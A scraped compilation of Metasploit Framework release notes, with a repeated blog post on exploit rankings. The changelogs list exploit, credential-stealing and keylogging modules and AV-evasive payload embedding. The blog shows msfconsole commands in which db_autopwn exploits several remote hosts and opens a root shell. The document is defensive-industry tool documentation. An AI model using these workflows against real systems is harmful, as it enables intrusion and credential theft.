SOURCE :http://mac.softpedia.com/progChangelog/Metasploit-Framework-Changelog-[29516.html
What's new in Metasploit Framework 3.5.1:
· The msfweb interface is no longer included.
This interface was marked as unsupported 12 months ago and no suitable replacements were found.
· The msfcli interface is now a thin wrapper around msfconsole.
auxiliary modules and passive exploits now work.
Armitage:
Armitage integrates with Metasploit 4.0 to:
· Take advantage of the new Meterpreter payload stagers
· Crack credentials with the click of a button
· Run post modules against multiple hosts
· Automatically log all post-exploitation activity
Metasploit Framework 3.3.3 Exploit Rankings
This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.
What's new in Metasploit Framework 4.0.0:
August 4th, 2011Statistics:
· Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
· 20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)
Highlights & New Features:
· This release marks the first major version change in five years. Please see the blog for more information.
· Several import parsers were rewritten to use Nokogiri for much faster processing of large import files.
· Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn't perfect nor is it nearly as complete as the Windows version, but many features already work.
· Java applet signing is now done directly in ruby, removing the need for a JDK for generating self-signed certificates.
· The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
· On a related note, Linux installers also ship with a working pcaprub extension. Expect pcap support in Windows to come later: #5117.
New Modules since 3.7.2:
New Exploit Modules:
· VSFTPD v2.3.4 Backdoor Command Execution
· Java RMI Server Insecure Default Configuration Java Code Execution
· HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
· HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
· Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
· Black Ice Cover Page ActiveX Control Arbitrary File Download
· Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
· MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview
· RealWin SCADA Server DATAC Login Buffer Overflow
· Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
· Iconics GENESIS32 Integer overflow version 9.21.201.01
· Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
· Sielco Sistemi Winlog Buffer Overflow
· Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
· HP OmniInet.exe Opcode 20 Buffer Overflow
· HP OmniInet.exe Opcode 27 Buffer Overflow
· Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview
New Post-Exploitation Modules:
· Winlogon Lockout Credential Keylogger
· Windows Gather Microsoft Outlook Saved Password Extraction
· Windows Gather Process Memory Grep
· Windows Gather Trillian Password Extractor
· Windows PCI Hardware Enumeration
· Windows Gather FlashFXP Saved Password Extraction
· Windows Gather Local and Domain Controller Account Password Hashes
· Windows Gather Nimbuzz Instant Messenger Password Extractor
· Windows Gather CoreFTP Saved Password Extraction
· Internet Download Manager (IDM) Password Extractor
· Windows Gather SmartFTP Saved Password Extraction
· Windows Gather Bitcoin wallet.dat
· Windows Gather Service Info Enumeration
· Windows Gather IPSwitch iMail User Data Enumeration
New Auxiliary Modules:
· John the Ripper Password Cracker Fast Mode
· Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
· Kaillera 0.86 Server Denial of Service
· 2Wire Cross-Site Request Forgery Password Reset Vulnerability
· SIPDroid Extension Grabber
· MSSQL Password Hashdump
Notable Features & Closed Bugs:
· Feature #4982 - Support for custom executable with psexec
· Feature #4856 - RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
· Feature #4578 - Update Nmap XML parsers to support Nokogiri parsing
· Feature #4417 - Post exploitation module to harvest OpenSSH credentials
· Feature #4015 - Increase test coverage for railgun
· Bug #4963 - Rework db_* commands for consistency
· Bug #4892 - non-windows meterpreters upload into the wrong filename
· Bug #4296 - Meterpreter stdapi registry functions create key if one doesn't exist
· Bug #3565 - framework installer fails on RHEL (postgres taking too long to start)
Armitage:
Armitage integrates with Metasploit 4.0 to:
· Take advantage of the new Meterpreter payload stagers
· Crack credentials with the click of a button
· Run post modules against multiple hosts
· Automatically log all post-exploitation activity
What's new in Metasploit Framework 3.7.0:
May 5th, 2011Statistics:
· Metasploit now ships with 685 exploit modules, 355 auxiliary modules, and 39 post modules.
· 35 new exploits, 17 post-exploitation modules, and 15 auxiliary modules have been added since the last release.
Highlights & New Features:
Feature highlights:
· Support for SMB signing, enabling pass-the-hash and stolen password attacks against Windows 2008 Server environments.
· The Microsoft SQL Server mixin (and all modules) now supports NTLM authentication.
· Data import backend has undergone a rewrite, speeding up most import tasks by a factor of four.
· OS information is now normalized to make fingerprinting more accurate and easier to deal with.
Highlights from the new modules include:
· Apple iOS Backup File Extraction: Extract sensitive data from iTunes backup files (location, call history, SMS content, pictures, etc).
· Exploits for two different Adobe Flash vulnerabilities exploited in the wild.
· Code execution modules for MySQL and PostgreSQL when a valid login is available.
· Exploit for the Accellion File Transfer Appliance Default Encryption Key flaw found by Rapid7.
· Over ten new exploits for HP Network Node Manager (plus an HP OpenView exploit).
· Post-exploitation module for privilege escalation through the .NET Optimizer Service.
· Post-exploitation modules for stealing stored WinSCP and VNC passwords.
What's new in Metasploit Framework 3.5.1:
December 16th, 2010· Statistics
· Metasploit now has 613 exploit modules and 306 auxiliary modules (from 551 and 261 respectively in v3.4)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (480K lines of Ruby)
· Over 85 tickets were closed since the last point release and over 130 since v3.4.0
· General
· Sessions now include additional information by default. This is often the username/hostname of the remote session.
· Dead sessions are now automatically detected and closed without requiring user interaction.
· The msfcli interface is now a thin wrapper around msfconsole; auxiliary modules and passive exploits now work.
· All modules now track which local user launched them (via module.owner)
· Resolve Windows error codes intro descriptive strings
· Automatically choose a preferred "reverse" payload if non was specified
· Warn the user if an antivirus program has corrupted the installation (EICAR canary)
· A socks4a proxy auxiliary module is available capable of routing through a meterpreter session
· Host names will now resolve properly on Windows with Ruby 1.9.1+
· Improved performance and accuracy of FTP and telnet brute force scanners
· Payloads
· Java Meterpreter is now available for some Java exploits such as exploit/multi/browser/java_trusted_chain
· A race condition in concurrent incoming session handling has been fixed
· The reverse_https stager is more reliable through an additional wfs_delay
· The ReverseListenerBindAddress option can be used to override LHOST as the local bind address for reverse connect payloads
· The ReverseListenerComm option can be set to "local" to prevent the listener from binding through a Meterpreter pivot
· Bug fixes for proper socket cleanup in exploit and auxiliary modules, even after exceptions are thrown
· Allow the IPv6 Bind stagers to work over Toredo tunnels
· Plugins
· Lab plugin added to manage target VM's
· Support for managing Nessus scans from the console via Zate Berg's plugin
· Meterpreter Scripts
· All scripts now run in the context of an anonymous class, with access to shared methods
· A script has been added by scriptjunkie for automatically exploiting weak service permissions
· Tab completion for the "run" command now looks in ~/.msf3/scripts/meterpreter/
· All credential-related tools (credcollect, hashdump, etc) now use the new creds database table
· Meterpreter Core
· Only a single SSL certificate is generated for all Meterpreter sessions per instance of Metasploit
· The AutoSystemInfo option can be disabled if username, hostname, and admin status should not be automatically obtained
· RAILGUN has been merged into the STDAPI extension and x64 support has been added
· Support slow/laggy connections better through extended timeouts
· Automatically closed file, register, process, thread, and event handles through finalizers
· Search for files (using the Windows index where available)
· Database
· A new db_export command has been added that produces db_import compatible XML snapshots of a given workspace
· Web sites and web application data is now stored in the web_sites, web_pages, web_forms, and web_vulns tables
· Import of both NeXpose Raw XML and NeXpose Simple XML has been improved
· Import support has been added for Retina and NetSparker XML
· The Nessusv2 XML format now uses an improved SAX-based parser
· The connection pool size has been reduced to match PostgreSQL defaults
· Cracked credentials now have their own database table (creds) instead of being a subclass of notes
· New exploited_hosts table added to streamline bookkeeping of successful session generation
· db_import more robust in the face of badly-formatted data
· report_note and report_vuln now automatically create associated hosts and services in the database if absent
· GUI
· A new Java GUI has been created to replace the GTK interface, which relied on unmaintained and buggy libraries
· The new GUI uses the XMLRPC interface to control Metasploit
· It supports launching modules, viewing running jobs and sessions, and interacting with sessions
· It can generate, encode, and save payloads with the features of msfencode
· It integrates support for most Meterpreter scripts
· It provides support for handling plugins
· It supports database connection, and allows viewing the database as well as limited interaction with the database
· Deprecated
· The msfweb interface is no longer included. This interface was marked as unsupported 12 months ago and no suitable replacements were found.
· The GTK interface is no longer included and has been replaced by scriptjunkie's Java GUI that uses the XMLRPC protocol.
· The sqlite3 backend is no longer supported and may be removed entirely in an upcoming point release. Use PostgreSQL or MySQL instead.
· The VNC stage for the old DLL injection stager (patchup) has been removed due to compatibility issues
· Deprecated specific filetypes for db_import_* commands; users should use just "db_import"
What's new in Metasploit Framework 3.4.1:
October 20th, 2010Statistics:
· Metasploit now has 551 exploit modules and 261 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (400K lines of Ruby)
· Over 100 tickets were closed since the last point release and over 200 since v3.3
General:
· The dns_enum auxiliary module now supports bruteforcing IPv6 AAAA records thanks to a patch from Rob Fuller
· Command shell sessions can now be automated via scripts using an API similar to Meterpreter
· The console can be automated using Ruby code blocks within resource files
· Initial sound support is available by loading the "sounds" plugin
· The Report mixin and report_* methods are now one-way, you can write to the database but not work with the results. This increases the scalability of the database.
· Many modules report information to the database by default now (auxiliary/scanner/*)
· Lotus Domino version, login bruteforce, and hash collector auxiliary modules
· Upgrade any command shell session to Meterpreter via sessions -u (Windows only)
· The VNC injection payload now uses the latest TightVNC codebase and bypasses Session 0 isolation
· Several modules were renamed to include their Microsoft Technet bulletin number, e.g. ie_xml_corruption is now ms08_078_xml_corruption
· Code can now interface directly with an installed Java Development Kit via a Java mixin. See the java_signed_applet exploit for an example.
· Tomcat and JBoss installations can be exploited to gain sessions (Windows x86/x64, Linux x86/x64)
· The msfencode utility can now generate WAR payloads for Tomcat and JBoss
· Oracle XDB SID brute forcing is much more comprehensive thanks to Thomas Ring
· The msfencode utility can now inject into an existing executable while keeping the original functionality
· The XMLRPC server has been improved and additional APIs are available
· The db_import command now supports NeXpose Simple XML, NeXpose Export XML, Nessus (NBE, XMLv1, XMLv2), QualysGuard XML, and Nmap
· The sqlite3 driver has been deprecated. To ease the transition away from sqlite3, the postgres driver is installed by default in the Linux installer.
· There is a new db_status command that shows which driver is currently in use and whether your database connection is active
Bruteforce Support:
· Account brute forcing has been standardized across all login modules
· Login and version scanning module names have been standardized
· The SSH protocol is now supported for brute force and fingerprint scans
· The telnet_login and ssh_login modules now create sessions
· MySQL is now supported for brute forcing, enumeration, service fingerprinting, and arbitrary SQL queries
· Postgres fingerprinting (pre-authentication) using the line numbers in the error messages
· Tomcat is now supported for brute forcing and session creation
Meterpreter:
· The Meterpreter process management APIs and commands can now see all processes on WinNT 4.0 -> Windows 7 (32 & 64)
· The Meterpreter can now migrate from 32 to 64 and from 64 to 32, in addition to using a new mechanism to do the migration.
· The Meterpreter adds the steal_token, drop_token, getprivs, and getsystem commands (including kitrap0d integration)
· The Meterpreter pivoting system now supports bidirectional UDP and TCP sockets
· The Meterpreter protocol handle now supports ZLIB compression of data blocks
· The Meterpreter can now take screenshots (jpeg) without process migration and bypasses Session 0 isolation
· The Meterpreter can now stage over a full-encrypted SSL 3.0 connection using the reverse_https stager
· The Meterpreter and Command Shell scripts are now evaluated in the context of a new Rex::Script object
· The "hashdump" Meterpreter script provides a safe way to dump hashes for the local user accounts
· Automatically route through new subnets with the auto_add_route plugin
Known issues:
· To deal with the myriad database synchronization issues, particularly in the sqlite3 driver, the database is write-only for the most part.
· When gems containing non-UTF8 characters are installed on the system, starting the framework fails with Encoding::UndefinedConversionError in ruby 1.9.x; this is bug #1914
· Interacting with a Meterpreter session while it is in the middle of migrating will cause the migration to fail and kill the session; this is bug #1360
· In some cases, backgrounded sessions have no output handle and can potentially lose data that should be printed to the console; this is bug #1982.
What's new in Metasploit Framework 3.3.3:
March 31st, 2010· All exploits now contain a ranking that indicates how dangerous the default settings are to the target host.
· The search command now takes a -r option to specify a minimum ranking of modules to return.
· The db_autopwn and nexpose_scan commands now take a -R option to specify a minimum ranking of modules to run.
· The InitialAutoRunScript option has been added to Meterpreter, providing a way for exploits to specify required post-exploit tasks (migrate out of a dying process).
· jRuby 1.4.0 can be used to run some parts of the framework, however it is not supported or recommended at this time.
· The sessions command can now run a single command (-c) or a script (-s) on all open sessions at once.
· The Win32 EXE template is now smaller (37k from 88k).
What's new in Metasploit Framework 3.3.1:
December 6th, 2009· Metasploit now has 453 exploit modules and 218 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit now integrates with all editions of NeXpose (see NeXpose_Plugin)
· The msfconsole now stores and loads history automatically
· The Linux installer now correctly unsets GEM_PATH to avoid gem installation conflicts
· Generated Windows executables are much more random and AV-resistant
· WMAP reporting now uses the notes table instead of a separate set of reporting tables
· Auxiliary scanners are now much more stable on Ruby 1.9.1
· Meterpreter migration sanity checks added
· The Windows installer now includes Nmap 5.10BETA1
What's new in Metasploit Framework 3.3:
November 17th, 2009Statistics:
· Metasploit now has 443 exploit modules and 216 auxiliary modules (from 320 and 99 respectively in v3.2)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (375k lines of Ruby)
· Over 170 tickets were closed during the 3.3 development process
General:
· Ruby 1.9.1 is now supported and recommended
· Windows Vista and Windows 7 are now supported
· Major improvements in startup speed thanks to patches from Yoann Guillot
Windows:
· The msfconsole is now the primary user interface on Windows (using RXVT)
· The Windows installer now uses Ruby 1.9.1 (cygwin)
· The Windows installer now ships with Cygwin 1.7
· The Windows installer now comes in full and mini editions
· The Windows installer can be launched silently with /S /D=C:path
· The Windows installation is now portable and can be installed to USB
· The Windows installation works on 64-bit Windows if launched in Compatibility Mode
· The Windows installer now offers to install Nmap 5.0 for your convenience
Linux:
· Standalone Linux installers are now available for 32-bit and 64-bit Linux. These installers contain a complete execution environment, including Ruby 1.9.1, Subversion, and dependent libraries.
· The preferred installation location is /opt/metasploit3/msf3, please see the Ubuntu and generic Linux installation guides for more information.
msfconsole:
· The startup banner now includes the number of days since the last update and the svn revision
· The RbReadline library is used by default, allowing msfconsole to work on systems without libreadline
· The -L parameter to msfconsole now allows the system Readline to be used if necessary
· A new 'connect' command, similar to netcat, that can use meterpreter routes
· Colorized output on terminals that support it. This can be disabled (or forced on) with the 'color' command
msfencode:
· Win32 payloads can now be embedded into arbitrary executables using 'msfencode -t exe -x MYFILE.exe -o MYNEWFILE.exe'.
· Win64 payloads can now be embedded into arbitrary 64-bit executables using 'msfencode -a x64 -e x64/xor -t exe -o MYNEWFILE.exe'.
· The default executable size for generated Win32 binaries now depends on the size of data/templates/template.exe. As of the release, this file is approximately 80k.
· Payloads can be generated as VBS scripts using the -t vbs option to msfencode. Persistent (looping) payloads can be generated with -t loop-vbs.
· Payloads can be generated as VBA macros for embedding into Office documents. The output is in two parts, the first must be pasted into the Macro editor, the second (hex) must be pasted to the end of the word document.
· The x86/alpha_mixed and x86/alpha_upper encoders now accept the AllowWin32SEH option (boolean) to use a SEH GetPC stub and generate 100% alphanumeric output.
msfxmlrpcd:
· This is a standalone Metasploit server that accepts authenticated connections over SSL.
· The demonstration client, msfxmlrpc, can be used to call the remote API
Database:
· Database support is now active as long as rubygems and at least one database driver are installed. The only db_* plugins are no longer necessary and have been deprecated.
· The vulnerabilities table now references the host as the parent table and not the service. This allows vulnerability information to be ported that is not tied to an exposed service.
Exploits:
· All applicable exploits now have OSVDB references thanks to a major effort by Steve Tornio
· New aix/rpc_ttdbserverd_realpath exploit module, which targets latest versions of IBM AIX operating system (5.3.7 to 6.1.4)
· Support for the Oracle InstantClient Ruby driver as an exploit mixin
· Support for the TDS protocol (MSSQL/Sybase) using a custom native Ruby driver (MSSQL 2000 -> 2008)
· Extensive support for exploitation and post-exploitation tasks against Oracle databases
· Extensive support for exploitation and post-exploitation tasks against Microsoft SQL Server databases
· The browser_autopwn module was completely rewritten using much more robust fingerprinting methods
· SOCKS4, SOCKS5, and HTTP proxies work much better now
Payloads:
· The Windows stagers now support NX platforms by allocating RWX memory using VirtualAlloc. The stagers have been updated to perform reliable stage transfer without a middle stager requirement.
· The reverse_tcp stager now handles connection failures gracefully by calling EXITFUNC when the connection fails. This stager can also try to connect more than once, which is useful for unstable network connections. The default connect try is 5 and can be controlled via the ReverseConnectRetries advanced option. Setting this value to 255 will cause the stager to connect indefinitely.
· The reverse_tcp_allports stager has been added, this will cycle through all possible 65,535 ports trying to connect back to the Metasploit console
· The ExitThread EXITFUNC now works properly against newer versions of Windows
· The CMD payloads now indicate support for specific userland tools on a per-exploit level
· The Windows stagers now support Windows 7
· New payload modules for Linux on POWER/PowerPC/CBEA
· New payload modules for Java Server Pages (JSP)
· New payload modules for Windows x64
· New payload modules for IBM AIX operating systems (versions 5.3.7 to 6.1.4)
Auxiliary:
· Scanner modules now run each thread in its own isolated module instance
· Scanner modules now report their progress (configurable via the ShowProgress and ShowProgressPercent advanced options).
· A simple fuzzer API is now available as well as 15 example modules covering HTTP, SMB, TDS, DCERPC, WiFi, and SSH.
· Ryan Linn's HTTP NTLM capture module has been integrated
· Support for the DECT protocol and DECT mixins have been integrated (using the COM-ON-AIR hardware)
· Support for the Lorcon2 library including a new Ruby-Lorcon2 extension
· Addition of airpwn and dnspwn modules to perform spoofing with raw WiFi injection using Lorcon2
· The pcaprub extension has been updated to build and run properly under Ruby 1.9.1
· Max Moser's pSnuffle packet sniffing framework has been integrated into Metasploit
Meterpreter:
· The Meterpreter now uses Stephen Fewer's Reflective DLL Injection technique by default as opposed to the old method developed by skape and jt.
· The Meterpreter now uses OpenSSL to emulate a HTTPS connection once the staging process is complete. After metsrv.dll is initialized, the session is converted into a SSLv3 link using a randomly generated RSA key and certificate. The target side now sends a fake GET request through the SSL link to mimic the traffic patterns of a real HTTPS client.
· The Meterpreter AutoRunScript parameter now accepts script arguments and multiple scripts. Each script and its arguments should be separated by commas.
· The Meterpreter can now take screen shots using the 'espia' extension and the 'screenshot' command. To use this feature, enter "use espia" and "screenshot somepath.bmp" from the meterpreter prompt.
· The Meterpreter can now capture traffic on the target's network. This is handled in-memory using the MicroOLAP Packet SDK. This extension can buffer up to 200,000 packets at a time. To use this feature, enter "use sniffer" and "sniffer_start" from the meterpreter prompt.
· The Meterpreter now supports keystroke logging by migrating itself into a process on the target desktop and using the keyscan_start and keyscan_dump commands.
· The Meterpreter now supports the "rm" file system command.
· The Meterpreter now supports the "background" command for when Ctrl-Z isn't feasible.
· The Meterpreter now supports 64-bit Windows.
· Alexander Sotirov's METSVC has been added to the Metasploit tree and stub payloads are available to interact with it
Meterpreter POSIX:
· The basic framework for Meterpreter on Linux, BSD, and other POSIX platforms was completed by JR
· The stdapi extension has been partially ported to the POSIX platform
Meterpreter Scripts:
· All scripts now accept a "-h" argument to show usage
Deprecated:
· The msfgui interface is not actively maintained and is looking for a new community owner
· The msfweb interface is not actively maintained and is looking for a new community owner
· The msfopcode command line utility is disabled until the Opcode Database is updated
· The msfopcode client API is disabled until the Opcode Database is updated and restored
Wednesday, December 23, 2009
Metasploit Framework 3.3.3 Exploit Rankings
This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.
The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The wiki page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:
msf> search -r great
From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:
msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi
msf (exploit/ms08_067_netapi) > exploit
[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).
The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the nexpose_scan or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:
msf exploit(psexec) > db_autopwn -b -x -t
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.47.203:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.32.2:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.32.2:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.44.223:139 exploit/solaris/samba/trans2open (CVE-2003-0201, BID-7294)
[*] XX.YY.44.223:139 exploit/multi/samba/nttrans (CVE-2003-0085, BID-7106)
[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.47.203:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc
id
uid=0(root) gid=0(wheel) groups=0(wheel)
The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The wiki page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:
msf> search -r great
From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:
msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi
msf (exploit/ms08_067_netapi) > exploit
[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).
The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the nexpose_scan or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:
msf exploit(psexec) > db_autopwn -b -x -t
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.47.203:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.32.2:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.32.2:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.44.223:139 exploit/solaris/samba/trans2open (CVE-2003-0201, BID-7294)
[*] XX.YY.44.223:139 exploit/multi/samba/nttrans (CVE-2003-0085, BID-7106)
[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.47.203:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc
id
uid=0(root) gid=0(wheel) groups=0(wheel)
'metasploit' 카테고리의 다른 글
[ metasploit ] msfconsole을 이용한 공격 ex) 윈도우NT 4서버(서비스팩 5, IIS 4.0 운용, x86 프로세서 플랫폼)에 대한 공격 (1) | 2011.10.06 |
---|---|
[ metasploit ] msfconsole interface (0) | 2011.10.06 |
Metasploit _ WIKIPEDIA (0) | 2011.09.29 |